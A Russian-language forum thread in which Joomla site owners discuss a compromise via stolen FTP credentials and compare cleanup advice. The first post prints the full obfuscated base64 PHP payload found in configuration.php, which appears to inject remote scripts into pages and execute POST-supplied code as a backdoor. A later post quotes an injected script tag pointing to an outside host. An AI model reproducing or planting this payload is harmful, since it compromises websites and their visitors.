Взлом сайта (опять троян упер пароль от ftp) - Безопасность сайтов на Joomla

Доброе время суток форумчане!
Сегодня утром меня разбудили "радостным" известием, не работает сайт.
Стал смотреть, реально не работает и выдает след. ошибку:

Fatal error: Cannot redeclare lmj9() (previously declared in /storage/home/srv15468/litsa/index.php(1) : eval()'d code:1) in /storage/home/srv15468/litsa/configuration.php(1) : eval()'d code on line 1  

Хотел зайти в админку и тоже не смог. Написал код ошибки в поисковике, но ничего не нашел. обратился к тех поддержке они тоже развели руками, с таким еще не сталкивались. в логах на первый взгляд ничего подозрительного. В общем как я понял в некоторых файлах прописался некий код:

<?php eval(base64_decode('aWYoIWlzc2V0KCRsbWo5MSkpe2Z1bmN0aW9uIGxtajkoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1w
nIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldm
FsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkp
JHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzK
j1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZ
XBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyZHlhV1ptYVc1MGIybHNaWFJvYVhKbExtT
nZMblZyTDJsdFlXZGxjeTl6TjJObkwyZHBabWx0Wnk1d2FIQWdQand2YzJOeWFYQjBQZz09JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJz
xib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49J
GE7cmV0dXJuICRzO31mdW5jdGlvbiBsbWo5MigkYSwkYiwkYywkZCl7Z2xvYmFsICRsbWo5MTskcz1hcnJheSgpO2lmKGZ1bmN0aW
9uX2V4aXN0cygkbG1qOTEpKWNhbGxfdXNlcl9mdW5jKCRsbWo5MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cy
gxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdsbWo5JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHN
lICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpP
j0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2xtajknKTtmb3IoJGk9M
DskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kbG1qOWw9KCgkYT1Ac2V0X2Vycm
9yX2hhbmRsZXIoJ2xtajkyJykpIT0nbG1qOTInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php
$mosConfig_MetaAuthor = '1';

Это кстати код из файла configuration.php.

Работоспособность сайта удалось востановить бекапом. Правда не знаю теперь на скоко этого хватит.  
Может кто нибудь знает что это такое и куда можно поставить заплатку?

проверить все машины, имеющие доступ к сайту (фтп) на предмет вирусов, поменять все пароли - это как минимум

Спасибо, сделаю.
Хотелось конечно докопаться до сути, как проникли...

configuration.php - это сердце вашего сайта... На нем должныс стоять права 444, или что подобное...А вы думаю установили что то вроде 775

Похоже что такому взлому подвержены сайты не только на Joomla. У меня такая же ситуация (joomlы на сайте нет), сайт был взломан первый раз в воскресенье, второй раз сегодня. Проникновение происходит по FTP с левого айпишника (каждый раз разный). Эта гадость видать ищет файлы по шаблону, вредоносный код был добавлен в файлы index.php, *db*.php, *config*.php и еще несколько. Так же оставляет мусор в *.js и *.html файлах - вставляет строки вида: <script src=http://foro.gamesquality.com/archive/indexi.php ></script>. Этот ихний indexi.php еще вчера был кривой и выводил PHP ошибки, а сегодня его уже "доработали" и он генерит js код, правда теперь ошибки есть уже в самом js коде Скоро того и гляди совсем усовершенствуют свое детище . Кстати сам foro.gamesquality.com выглядит как безобидный форум, возможно они сами жертвы взлома.

А теперь самое главное - взлом моего сайта повторился после СМЕНЫ пароля на FTP. Т.е. получается эта гадость опять узнала пароль? На хостинге установлен WebHost Manager и C-Panel.
piratik, какая админ панель используется на вашем хостинге? Присутствуют ли на вашем сайте какие-нибудь тулзы сторонних разработчиков на PHP? (phpMyAdmin, etc.). Хотелось бы разобратся как именно эта штука узнает фтп пароль.

intruder, а может вы просто фтп пароль в проге сохраняете?
никогда нельзя их сохранять, надо каждый раз вводить

vaganofff,
до этого пароль был сохранен в FAR manager, но новый пароль я уже нигде не сохранял.
Похоже ситуация с паролем прояснилась. ФТП сервер был настроен на возможность подключения к любому фтп аккаунту используя root пароль (его я не менял), т.е. скорей всего этой штуке известен именно рут пароль. Сейчас поменял и его. Ну если и после этого атака повторится, тогда даже не знаю с какой стороны к этому подходить. Как-то же в первый раз оно его узнало.

Такая же ситуация.. Первый раз был вирус в мае месяце, я подчистил сайт. Сменил пароль и нигде не хранил его.  Вводил вручную.. и вот 13-15 он снова пожаловал.. Снова пришлось чистить его. Права выставлены верно.. проверил несколько раз..

не получаеться ничего.. понимаю, что любилель в этом. но хотелось бы, чтобы всё просто работало.